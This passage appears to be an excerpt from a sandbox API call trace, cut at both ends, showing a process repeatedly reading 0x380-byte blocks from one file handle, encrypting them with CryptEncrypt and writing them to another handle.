lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.685] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.685] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.685] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.685] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.685] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.685] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.685] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.685] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.685] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.685] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.685] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.685] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.686] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.686] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.686] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.686] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.686] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.686] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.686] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.686] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.686] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.686] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.686] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.686] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.686] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.686] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.686] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.686] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.687] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.687] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.687] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.687] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.687] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.687] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.746] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.746] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.746] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.746] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.746] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.746] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.747] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.747] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.747] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.747] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.747] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.747] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.747] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.747] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.747] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.747] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.747] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.753] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.753] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.753] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.753] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.753] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.753] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.754] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.754] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.754] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.754] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.754] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.754] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.754] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.754] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.754] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.754] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.754] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.754] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.754] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.754] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.754] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.755] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.755] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.755] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.755] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.755] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.755] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.755] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.755] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.755] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.755] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.755] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.755] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.755] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.755] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.755] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.756] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.756] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.756] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.756] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.756] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.756] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.756] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.756] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.757] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.757] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.757] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.757] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.757] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.757] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.757] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 